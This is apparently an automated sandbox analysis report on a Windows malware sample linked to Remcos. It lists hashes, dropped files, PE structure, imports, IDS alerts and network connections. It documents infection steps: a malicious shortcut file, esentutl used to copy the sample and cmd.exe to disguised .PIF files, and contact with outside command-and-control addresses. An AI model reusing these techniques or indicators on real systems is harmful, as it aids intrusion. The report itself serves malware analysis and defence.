                                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMskWTsbxK2tKuAu:HRYFVmTWDyzZkWTExKKKPu
                                                        MD5:FDFB411C003350B3E521F33300137544
                                                        SHA1:D23909681FEE8C5AEF928265EB9932336AB32A4C
                                                        SHA-256:44D149A12ED89AB4CA77F1952646B75770BF67E928E9D172D56D374672126B20
                                                        SHA-512:D3888B3485A224B87FA47B7C77E78512A65AA6738046A9AD17314FD6D910BBF69C44E8F9165CFEDF9D4DD49CBBFA2D86BC7321CBEE70D39E527A855E86F9EB68
                                                        Malicious:true
                                                        Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF"..IconIndex=916994..HotKey=33..
                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):236544
                                                        Entropy (8bit):6.4416694948877025
                                                        Encrypted:false
                                                        SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                        MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                        SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                        SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd, Detection: malicious
• Filename: ZPujMIT7Vs.exe, Detection: malicious
• Filename: ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd, Detection: malicious
• Filename: Contact Form and Delivery Details ,pdf.cmd, Detection: malicious
• Filename: Duclot Collections.bat, Detection: malicious
• Filename: GestionPagoAProveedores_100920241725998901306_PDF.cmd, Detection: malicious
• Filename: 241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmd, Detection: malicious
• Filename: Julcbozqsvtzlo.cmd, Detection: malicious
• Filename: Confirmation.docx.exe, Detection: malicious
• Filename: IEry29c3sb.exe, Detection: malicious
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\colorcpl.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):962
                                                        Entropy (8bit):5.013130376969173
                                                        Encrypted:false
                                                        SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                                        MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                                        SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                                        SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                                        SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                                        Malicious:false
                                                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                        Category:dropped
                                                        Size (bytes):591
                                                        Entropy (8bit):4.670540606268435
                                                        Encrypted:false
                                                        SSDEEP:12:qKrbxTz9eSbZ7u0wxDDDDDDDDjCaY5q7aYAVurlTB8NGNSeKG:FrbxTz9p7u0wQakIaDuxt8NK
                                                        MD5:D689C79CBED9E601B490125F8288D039
                                                        SHA1:FAF4A4F613734157DC6B86F522F5205E9C6FEBC1
                                                        SHA-256:ECFBC5A1CDC3D4A555DF01B67098B12FF5C76857A5C4E9FEE7C1975DC22572B7
                                                        SHA-512:5717F86D2DA2D8D5F0CF12944C96746E3810471408A2C57D41E33B5696654708AE90CCC98D4617066846075C1D631AE6AA2B3BF45E04A26EF3B4EC868660BAF4
                                                        Malicious:false
                                                        Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\XjPA2pnUhC.exe...Destination File: C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x109c00 (1088512) (1 MB)....Total bytes written = 0x10a000 (1089536) (1 MB).......Operation completed successfully in 0.250 seconds.....
                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                        Category:dropped
                                                        Size (bytes):564
                                                        Entropy (8bit):4.5615979709668295
                                                        Encrypted:false
                                                        SSDEEP:12:q6pLExT6ceSbZ7u0wxDDDDDDDDjCaY5n4aYAWS4TB8NGNX:/pLExT6cp7u0wQakn4al4t8Nq
                                                        MD5:05A22680B7DECD8C26D4054C11805539
                                                        SHA1:51F76562E7B57B2CDF8484743FCD843E240736F2
                                                        SHA-256:A6C6F4DDA4F2AA5BFBB114583885897C7C6466CF72AB9EADBD0CCD2F2DE57E4A
                                                        SHA-512:869E46F222F753CE756DD5F46A76A25D517B0BDE88514BDA063DA9AF763911CE0A3062B687DAA71C4655A49BFA3FA7E0F5B8E3E1F5246B5F2A7DA21AB1BE430D
                                                        Malicious:false
                                                        Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\cmd.exe...Destination File: C:\\Users\\Public\\alpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x39c00 (236544) (0 MB)....Total bytes written = 0x3a000 (237568) (0 MB).......Operation completed successfully in 0.78 seconds.....
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.864877848429584
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.81%
                                                        • Windows Screen Saver (13104/52) 0.13%
                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        File name:XjPA2pnUhC.exe
                                                        File size:1'088'512 bytes
                                                        MD5:bbf710c83246092a538128620853d4fd
                                                        SHA1:95338f06c76178de31b5e8453f92c43f970ea9f9
                                                        SHA256:7ad64f279e3fa6a7d0ef2916240f1337584c5b5176fb56089771164f2905554f
                                                        SHA512:a609d92fe0d25e7db140c731af4b241d47cdaddfe735d9f7575c982ef790ab01d7f969038546e6054101b745e8c208f74e41faf246173ca0722c7b994cf94001
                                                        SSDEEP:24576:ZUfEsM2Vlh4rSmqEhbhuJ2GH7JeUPUd6Yq7+gyQxy/Z:ZC4m/H7UU
                                                        TLSH:E435ADA2D5808975E126063C5D06C3EA682F6D313B3CF8963AD9BBC97AF4C44B45E1D3
                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                        Icon Hash:30c082aa969f8c61
                                                        Entrypoint:0x464824
                                                        Entrypoint Section:.itext
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                        DLL Characteristics:
                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:5c26047c5bc830c77e8237d6b4b0b716
                                                        Instruction
                                                        push ebp
                                                        mov ebp, esp
                                                        add esp, FFFFFFF0h
                                                        mov eax, 0046352Ch
                                                        call 00007FF8C476FFE9h
                                                        mov eax, dword ptr [004F6128h]
                                                        mov eax, dword ptr [eax]
                                                        call 00007FF8C47BFEF5h
                                                        mov ecx, dword ptr [004F6230h]
                                                        mov eax, dword ptr [004F6128h]
                                                        mov eax, dword ptr [eax]
                                                        mov edx, dword ptr [00463288h]
                                                        call 00007FF8C47BFEF5h
                                                        mov eax, dword ptr [004F6128h]
                                                        mov eax, dword ptr [eax]
                                                        call 00007FF8C47BFF69h
                                                        call 00007FF8C476DE58h
                                                        lea eax, dword ptr [eax+00h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xfb000 | 0x2886 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x107000 | 0xb800 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x100000 | 0x6c50 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xff000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xfb788 | 0x648 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x627b4 | 0x62800 | 0f32e850ef715d999396547333e20849 | False | 0.5216454830266497 | data | 6.541555656889583 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x64000 | 0x86c | 0xa00 | 539684b9bc23f946eff33c25d7c9698d | False | 0.535546875 | data | 5.637001620348067 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x65000 | 0x912d8 | 0x91400 | 23bc3940b0cff067522cd1287415a080 | False | 0.4030160821858864 | data | 6.442332798220384 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0xf7000 | 0x36f8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xfb000 | 0x2886 | 0x2a00 | 492b3631cb998875f40004e587f945ac | False | 0.3117559523809524 | data | 5.10368978717298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xfe000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xff000 | 0x18 | 0x200 | f9d59e0837e53d5c440d940847b16f0e | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x100000 | 0x6c50 | 0x6e00 | 5759cadc9e3a63e62689f080f461a17e | False | 0.6497514204545455 | data | 6.686766299054601 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x107000 | 0xb800 | 0xb800 | 4431599255d60d10545599d628acd9a6 | False | 0.21658457880434784 | data | 4.259621358802321 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x107a88 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x107bbc | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x107cf0 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x107e24 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x107f58 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x10808c | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x1081c0 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x1082f4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x1084c4 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x1086a8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x108878 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x108a48 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x108c18 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x108de8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x108fb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x109188 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x109358 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x109528 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0x109610 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m | | | 0.13642857142857143
RT_DIALOG | 0x10fdf8 | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x10fe4c | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x10fea0 | 0x404 | Targa image data - Color 99 x 107 x 32 +68 +111 "z" | | | 0.4143968871595331
RT_STRING | 0x1102a4 | 0x1c8 | data | | | 0.5592105263157895
RT_STRING | 0x11046c | 0xcc | data | | | 0.6764705882352942
RT_STRING | 0x110538 | 0x114 | data | | | 0.6086956521739131
RT_STRING | 0x11064c | 0x350 | data | | | 0.43514150943396224
RT_STRING | 0x11099c | 0x3bc | data | | | 0.3817991631799163
RT_STRING | 0x110d58 | 0x370 | data | | | 0.4022727272727273
RT_STRING | 0x1110c8 | 0x3cc | data | | | 0.33539094650205764
RT_STRING | 0x111494 | 0x214 | data | | | 0.49624060150375937
RT_STRING | 0x1116a8 | 0xcc | data | | | 0.6274509803921569
RT_STRING | 0x111774 | 0x194 | data | | | 0.5643564356435643
RT_STRING | 0x111908 | 0x3c4 | data | | | 0.3288381742738589
RT_STRING | 0x111ccc | 0x338 | data | | | 0.42961165048543687
RT_STRING | 0x112004 | 0x294 | data | | | 0.42424242424242425
RT_RCDATA | 0x112298 | 0x10 | data | | | 1.5
RT_RCDATA | 0x1122a8 | 0x358 | data | | | 0.6869158878504673
RT_RCDATA | 0x112600 | 0x156 | Delphi compiled form 'TForm1' | | | 0.7894736842105263
RT_GROUP_CURSOR | 0x112758 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x11276c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x112780 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x112794 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x1127a8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x1127bc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x1127d0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x1127e4 | 0x14 | data | | | 1.25
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll | GetErrorInfo, SysFreeString
ole32.dll | CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
Language of compilation system | Country where language is spoken
English | United States
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-09-25T09:34:42.731337+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549706192.161.184.442468TCP
                                                        2024-09-25T09:34:43.932990+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549707178.237.33.5080TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 09:34:34.543014050 CEST | 49704 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:34.543051958 CEST | 443 | 49704 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:34.543242931 CEST | 49704 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:34.543242931 CEST | 49704 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:34.543380022 CEST | 443 | 49704 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:34.547012091 CEST | 49704 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:34.568825006 CEST | 49705 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:34.568864107 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:34.568924904 CEST | 49705 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:34.570169926 CEST | 49705 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:34.570179939 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:35.489897013 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:35.490026951 CEST | 49705 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:35.494180918 CEST | 49705 | 443 | 192.168.2.5 | 112.137.173.77
Sep 25, 2024 09:34:35.494191885 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:35.494429111 CEST | 443 | 49705 | 112.137.173.77 | 192.168.2.5
Sep 25, 2024 09:34:35.535327911 CEST | 49705 | 443 | 192.168.2.5 | 112.137.173.77
